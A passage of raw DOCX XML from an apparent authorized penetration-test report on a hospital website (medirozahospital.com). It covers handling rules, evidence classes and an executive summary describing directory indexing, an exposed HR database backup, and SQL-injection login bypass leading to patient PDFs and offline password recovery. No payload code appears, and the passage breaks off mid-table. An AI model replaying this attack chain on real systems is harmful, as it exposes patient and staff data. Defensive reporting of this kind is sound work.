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65D"/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>MEDIROZA GENERAL HOSPITAL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="2F5597"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>INDEPENDENT WEB APPLICATION SECURITY ASSESSMENT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="595959"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>&amp; EXPLOITATION CASE STUDY</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Prepared by Chandrashekar Bala</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Authorized black-box external assessment  |  Assessment date: 01 October 2026  |  Report date: 02 October 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Target: https://medirozahospital.com  |  Classification: CONFIDENTIAL</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7365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Project characteristic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Assessment type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>External black-box web application security assessment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Primary objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Identify, validate and document exploitable weaknesses and their real impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Evidence standard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Reproducible request/response evidence, screenshots, hashes and command register</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Portfolio positioning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Independent technical case study derived from an authorized controlled assessment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>This edition is intentionally presented as a standalone security engineering project rather than as a classroom milestone report. The underlying activity was performed under written authorization in a controlled environment; the report focuses on the technical work, evidence quality, attack-chain reasoning, remediation engineering and retest criteria that make the project useful as a professional portfolio artifact.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Document Control, Provenance &amp; Handling</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7365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Author</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Chandrashekar Bala</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Primary target</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>https://medirozahospital.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Resolved address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>199.188.201.16</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Assessment type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Black-box external web application penetration test</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Authorization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Written authorization for security testing was provided by the exercise owner</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Assessment date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>01 October 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Report version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2.0 — Independent Portfolio Edition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Classification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CONFIDENTIAL — restricted technical evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Project provenance: the assessment was originally performed within an authorized Networkwalks controlled environment. This report deliberately removes classroom milestone framing from the main narrative and presents the work as a standalone security assessment and exploitation case study. The authorization boundary remains unchanged: testing was limited to the target domain; no social engineering or denial-of-service activity was performed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Handling requirements</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Do not publish the confidential report, recovered document passwords, raw patient PDFs, national identifiers, direct employee contact data or the raw SQL backup.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>For public portfolio use, publish only a sanitized version that removes credentials and sensitive personal data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Preserve evidence hashes and the original evidence package when demonstrating reproducibility privately.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>The report distinguishes confirmed observations from interpretations and explicitly records limitations where a control could not be independently verified.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Evidence classification</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Class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Examples</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>E0 — Public surface</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DNS, public HTML, HTTP status, public metadata</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Suitable for narrative evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>E1 — Technical restricted</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Nmap, Burp captures, error output, SQLi proof</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Restricted technical distribution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>E2 — Sensitive</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Patient-report artifacts, hashes, decrypted evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Confidential; minimum necessary handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>E3 — Credential/identity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Recovered passwords, national IDs, direct contact data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Never publish; restricted appendix only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>This assessment identified a connected set of weaknesses that permits an external attacker to move from ordinary web reconnaissance to access to highly sensitive information without privileged network access. The two most consequential paths are independent: an exposed database backup directly disclosed internal staff and shareholder records, while SQL injection in the patient login flow bypassed authentication and enabled retrieval of three confidential pathology-report PDFs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The evidence is unusually strong for a portfolio case study because the assessment does not stop at scanner output. It establishes a baseline request, changes a single input, records the resulting HTTP-state transition, confirms the authenticated portal in a browser, retrieves the referenced files, analyzes their protection, performs offline password recovery, validates the recovered documents and separately retrieves the exposed database backup. The result is a demonstrable end-to-end attack chain rather than a list of theoretical vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Risk at a glance</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2045"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Primary impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Unauthenticated directory indexing on /old/, /patient/ and /staff/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="FFEDD5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="D97706"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>7.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Public enumeration of application files, logs, report paths and backup names.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Unauthenticated internal HR database backup exposure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="FEE2E2"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>9.4*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
